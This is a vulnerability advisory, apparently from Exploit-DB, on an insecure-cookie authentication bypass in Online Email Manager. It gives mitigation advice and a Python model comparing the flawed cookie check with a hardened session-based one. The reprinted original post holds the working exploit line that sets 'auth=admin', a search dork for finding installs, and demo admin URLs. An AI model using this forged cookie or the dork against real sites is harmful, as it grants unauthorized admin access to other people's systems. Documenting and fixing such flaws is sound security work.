Vendor: Online Email Manager
Author: Hussin X
CVSS: 8.8 (HIGH)
CWE: 613 (Insecure Cookie Handling)
Product Name: Online Email Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2009

Online Email Manager Insecure Cookie Handling Vulnerability

Online Email Manager decides whether a visitor is an administrator from the value of the client-supplied auth cookie rather than from a server-side session. Setting that cookie to admin (for example with the JavaScript statement document.cookie = "auth=admin; path=/") and then requesting emailList.php is enough to reach the admin page without ever supplying credentials.

Mitigation:

Never derive authorization from a cookie value the client can choose. After a successful login the server should issue a random, unguessable session identifier, store the user's role server-side, and look that role up on every request to an admin page; a cookie whose value is a role name (auth=admin) should be treated as meaningless. The session cookie should also be sent with the HttpOnly and Secure attributes.
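The description and the mitigation above are both about one server-side trust decision, so the following added Python model shows the flawed check beside a hardened one. This is example code written for this page, not the product's PHP source; the salt, the password hash, the cookie name session and the SessionStore class are all constructed for the illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed credential record for the example: a PBKDF2 hash of the
# password "correct-horse" under a fixed salt. Nothing here comes from the
# real product; a real deployment stores a per-user random salt.
_SALT = b"example-salt"
_ADMIN_PASSWORD_HASH = hashlib.pbkdf2_hmac("sha256", b"correct-horse", _SALT, 100_000)


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie request header ("a=1; b=2") into a name -> value dict."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def is_admin_vulnerable(cookies: Dict[str, str]) -> bool:
    """The flawed pattern described on this page: the cookie's value itself is
    taken as proof of role. The browser's owner controls that value, so the
    check grants admin access to any request that carries auth=admin."""
    return cookies.get("auth") == "admin"


class SessionStore:
    """Hardened pattern: the cookie carries only a random, unguessable token;
    the role lives server-side and is never read from the client."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}  # session token -> role

    def login(self, username: str, password: str) -> Optional[str]:
        """Verify credentials; on success mint a session token, which is the
        only thing that ever reaches the browser."""
        if username != "admin":
            return None
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)
        if not hmac.compare_digest(candidate, _ADMIN_PASSWORD_HASH):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = "admin"
        return token

    def role_for(self, cookies: Dict[str, str]) -> Optional[str]:
        """Resolve the role from the session cookie, or None if the cookie is
        absent or unknown. A forged value such as session=admin simply misses."""
        token = cookies.get("session")
        if not token:
            return None
        # Constant-time comparison against each stored token so response
        # timing does not leak how much of a guessed token matched.
        for stored, role in self._sessions.items():
            if hmac.compare_digest(stored, token):
                return role
        return None


def is_admin_hardened(store: SessionStore, cookies: Dict[str, str]) -> bool:
    """Admin access is granted only when the server-side record says so."""
    return store.role_for(cookies) == "admin"


def session_set_cookie(token: str) -> str:
    """Set-Cookie value for the session: HttpOnly keeps page scripts away from
    it, Secure keeps it off plaintext HTTP, SameSite=Lax limits cross-site
    sends. None of these attributes fixes the original flaw on its own; the
    server-side lookup above is what removes the client's control over the role."""
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    forged = parse_cookie_header("auth=admin")
    print("vulnerable check grants admin to forged cookie:", is_admin_vulnerable(forged))
    store = SessionStore()
    print("hardened check grants admin to forged cookie:", is_admin_hardened(store, forged))
    token = store.login("admin", "correct-horse")
    print("hardened check after real login:", is_admin_hardened(store, {"session": token}))
```

The point of the pair is that the hardened check never compares anything the client sent against a role name: the only value accepted from the browser is a 256-bit random token that the server itself issued, and the role is looked up from that token.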

Exploit-DB raw data:

Online Email Manager Insecure Cookie Handling Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_email_manager.phps
 
DorK   : Powered by Online Email Manager



exploit:

javascript:document.cookie = "auth=admin; path=/";



exploit for demo

|# http://www.esoftpro.com/demo/OEM/admin/index.php

|ex   javascript:document.cookie = "auth=admin; path=/";

|#  go to url "emailList.php"

|#  http://www.esoftpro.com/demo/OEM/admin/emailList.php

|# you log in to the admin page :d






Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

# milw0rm.com [2009-04-17]